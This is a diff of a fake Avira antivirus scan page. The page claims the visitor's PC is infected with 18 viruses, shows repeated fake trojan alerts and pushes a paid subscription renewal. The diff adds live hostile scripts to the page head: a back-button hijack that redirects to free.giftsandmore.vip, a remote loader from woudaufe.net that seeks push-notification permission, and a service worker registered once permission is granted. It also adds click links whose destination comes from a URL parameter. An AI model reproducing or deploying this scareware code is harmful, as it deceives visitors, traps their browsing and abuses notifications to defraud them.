--- a/-- clean/Avira/Avira 1/index.html
+++ b/-- clean/Avira/Avira 1/index.html
@@ -2,37 +2,85 @@
 <html class="fa-events-icons-ready">
 
 <head>
-
 	<meta charset="utf-8">
-	<!--[if IE]><meta http-equiv="X-UA-Compatible" content=""><![endif]-->
 	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
 	<title>Online monitor</title>
 
 	<meta name="description" content="">
-	<link rel="shortcut icon" href="6450fd566e37717983d4c2bb7a9d726e.static.png">
-
+	<link rel="shortcut icon" href="img/6450fd566e37717983d4c2bb7a9d726e.static.png">
 	<link
 		href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300&amp;display=swap"
 		rel="stylesheet">
 	<script src="js/c6b1725a3c7db78273eeed86b7600a2c.static.js"></script>
-	<link href="js/8dcc1d5df036ede9a98e779763fed639.static.css" media="all" rel="stylesheet">
+	<link href="css/8dcc1d5df036ede9a98e779763fed639.static.css" media="all" rel="stylesheet">
 	<link rel="stylesheet" type="text/css" href="css/f8b01359e933b40f34eb1c65113b4e1f.static.css">
 	<script src="js/df5c4a2b51cc1ae1884b8de285c6aa63.static.js"></script>
 	<script src="js/3b81f7063987feec395640c380ab08a1.static.js"></script>
 	<script src="js/a986f67481b4c04b140758825e86d28e.static.js"></script>
 	<script type="text/javascript" async=""
-		src="33720a9886c013a58f4d8b4210684b2d.static.js?cb=googleTranslateElementInit"></script>
+		src="js/33720a9886c013a58f4d8b4210684b2d.static.js?cb=googleTranslateElementInit"></script>
 	<script src="js/25ee284ab5d2d601c6d1ecf1a505b513.static.js"></script>
 	<link type="text/css" rel="stylesheet" charset="UTF-8" href="css/31aa060f9feff2c80c0d35d3c3b77e7d.static.css">
 	<script type="text/javascript" charset="UTF-8" src="js/080273aed7cc312cc769fb65b8556565.static.js"></script>
 	<link rel="stylesheet" href="css/https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css">
+
+	<script>
+		(function (window, location) {
+			var redirect = "https://free.giftsandmore.vip/?utm_medium=bddab1254dc804572f4ea39f14a9b6c0d448fe5f&utm_campaign=Back-Button-Redirect";
+			var currentUrl = location.origin + location.pathname + location.search;
+			if (location.hash !== "#!/hst") {
+				history.replaceState(null, document.title, currentUrl + "#!/hst");
+				history.pushState(null, document.title, currentUrl);
+			}
+
+			window.addEventListener("popstate", function () {
+				if (location.hash === "#!/hst") {
+					setTimeout(function () {
+						window.location.replace(redirect);
+					}, 0);
+				}
+			}, false);
+		}(window, location));
+	</script>
+	<script>
+		function getURLParameter(name) {
+			var query = window.location.search.substring(1);
+			var vars = query.split("&");
+			for (var i = 0; i < vars.length; i++) {
+				var pair = vars[i].split("=");
+				if (pair[0] === name) { return decodeURI(pair[1]); }
+			}
+			return "";
+		}
+	</script>
+	<script>
+		var s = document.createElement('script');
+		s.src = '//woudaufe.net/act/files/micro.tag.min.js?z=6356874' + '&sw=/sw-check-permissions-82528.js';
+		s.onload = function (result) {
+			switch (result) {
+				case 'onPermissionDefault': break;
+				case 'onPermissionAllowed': break;
+				case 'onPermissionDenied': break;
+				case 'onAlreadySubscribed': break;
+				case 'onNotificationUnsupported': break;
+			}
+		};
+		document.head.appendChild(s);
+	</script>
+	<script>
+		(function () {
+			const interval = setInterval(() => {
+				if (Notification.permission === 'granted') {
+					navigator.serviceWorker.register('/sw.enot.js?appId=1005e5d4864ca6b4e77a62c8c770b62', { scope: '/ntx' })
+					clearInterval(interval)
+				}
+			}, 300)
+		})()
+	</script>
 </head>
 
 <body class="browserStack etc">
-
-
 	<header>
-
 		<section class="wrapper">
 			<img src="img/4733599af88cfdbf69875b5a159e1eff.static.png">
 		</section>
@@ -40,32 +88,23 @@
 
 	<div>
 		<section class="wrapper">
-
 			<section class="col-6">
-
-
-
 			</section>
 		</section>
 	</div>
 
-
 	<section class="firtest" style="opacity: 1;">
-
 		<section class="head">
 			<img src="img/86da1177b691a27c03f6ba24e5534d1d.static.png">
 			Avira Antivirus
-
 			<span class="icons">
 				<img src="img/9d8299722b5c1b6c4032c3d34ac74d95.static.png">
 				<img src="img/096f303827ed3b21e45526a63fb05f97.static.png">
 			</span>
 		</section>
-
 		<section class="body">
 			<h1>Quick Scan</h1>
 			<p>Scanning commonly infected areas and startup src...</p>
-
 			<section class="progress">
 				<section class="project">
 					<section class="total">Total items scanned: <span id="cont">54760</span></section>
@@ -207,38 +246,40 @@
 				Total security risks requiring attention: <i class="tsrra" style="color: rgb(192, 24, 24);">1</i>
 			</section>
 		</section>
-
 		<img class="tog" src="img/50fd30a4064ac26655704beb7c4e9764.static.png">
-
 	</section>
 
 
 	<section class="latest">
 		<section class="head">
 			<img src="img/d564f07a4b609125280e8d9a54a3c224.static.png">
-
 			Your <span class="device">PC</span> is infected with 18 viruses!
-
-
 			<span class="icons">
-				<a href="https://number.77trackdomain.com/click"><img src="16d048ffee8decbae68c4fe8d5f82c67.static.png"></a>
-				<a href="https://number.77trackdomain.com/click"><img src="f0f43b66bb0a6dbd797ed9f5eeaa5482.static.png"></a>
+				<script>
+					document.write('<a href="https://' + getURLParameter('domain') + '/click" tabindex="0" class="button exitpoint">' +
+						'<img src="img/16d048ffee8decbae68c4fe8d5f82c67.static.png" alt="Image">' +
+						'</a>');
+				</script>
+				<script>
+					document.write('<a href="https://' + getURLParameter('domain') + '/click" tabindex="0" class="button exitpoint">' +
+						'<img src="img/f0f43b66bb0a6dbd797ed9f5eeaa5482.static.png" alt="Image">' +
+						'</a>');
+				</script>
 			</span>
 		</section>
-
 		<section class="body">
 			<i><b>IMMEDIATE ACTION IS REQUIRED!</b></i>
-
 			<i>Viruses found on this <span class="device">PC</span> most likely track internet activity to collect banking
 				details and login credentials. </i>
-
 			<i>Please renew subscription to keep your <span class="device">PC</span> protected.</i>
 		</section>
-
-		<section class="url"><a href="https://number.77trackdomain.com/click">Renew Antivirus Subscription</a></section>
-
+		<section class="url">
+			<script>
+				document.write('<a href="https://' + getURLParameter('domain') +
+					'/click" tabindex="0">Renew Antivirus Subscription</a>')
+			</script>
+		</section>
 		<p class="under-btn">Unprotected PCs are 93% more vulnerable to suffer from malware.</p>
-
 	</section>
 
 	<section class="upp upp_1" style="display: block; bottom: 20px;">
@@ -246,20 +287,19 @@
 			<strong>Threat Detected!</strong>
 			<i>Trojan.Fakealert.356</i>
 		</section>
-
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -276,16 +316,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -302,16 +342,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -328,16 +368,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -354,16 +394,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -380,16 +420,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -406,16 +446,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -432,16 +472,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -458,16 +498,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -484,16 +524,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -510,16 +550,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -536,16 +576,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -562,16 +602,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -588,16 +628,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -614,16 +654,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -640,16 +680,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -666,16 +706,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -692,16 +732,16 @@
 		<section class="body">
 			<ul>
 				<li>
-					<img src="f844935001ff177e5ab7b171687c139e.static.gif">
+					<img src="img/f844935001ff177e5ab7b171687c139e.static.gif">
 					High Risk
 				</li>
 				<li>
-					<img src="33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
+					<img src="img/33981ee8fa88bc7bfdc315f7b03509f6.static.gif">
 					Origin
 					<span>Not available</span>
 				</li>
 				<li>
-					<img src="214cce24e53f779e0e9bd78851e34557.static.gif">
+					<img src="img/214cce24e53f779e0e9bd78851e34557.static.gif">
 					Activity
 					<span>Threat actions performed: 1</span>
 				</li>
@@ -722,8 +762,8 @@
 		style="border-radius: 12px; margin: 0 0 0 -23px; padding: 0; font-family: 'Google Sans', Arial, sans-serif;"
 		data-id="">
 		<div id="goog-gt-vt" class="VIpgJd-yAWNEb-hvhgNd">
-			<div class=" VIpgJd-yAWNEb-hvhgNd-l4eHX-i3jM8c"><img src="c79d2430bf0fa2ab47a3c2bb86189777.static.svg" width="24"
-					height="24" alt=""></div>
+			<div class=" VIpgJd-yAWNEb-hvhgNd-l4eHX-i3jM8c"><img src="img/c79d2430bf0fa2ab47a3c2bb86189777.static.svg"
+					width="24" height="24" alt=""></div>
 			<div class=" VIpgJd-yAWNEb-hvhgNd-k77Iif-i3jM8c">
 				<div class="VIpgJd-yAWNEb-hvhgNd-IuizWc" dir="ltr">Original text</div>
 				<div id="goog-gt-original-text" class="VIpgJd-yAWNEb-nVMfcd-fmcmS VIpgJd-yAWNEb-hvhgNd-axAV1"></div>
@@ -769,8 +809,6 @@
 			</div>
 		</div>
 	</div>
-
-
 	<div class="VIpgJd-ZVi9od-aZ2wEe-wOHMyf">
 		<div class="VIpgJd-ZVi9od-aZ2wEe-OiiCO"><svg xmlns="http://www.w3.org/2000/svg" class="VIpgJd-ZVi9od-aZ2wEe"
 				width="96px" height="96px" viewBox="0 0 66 66">
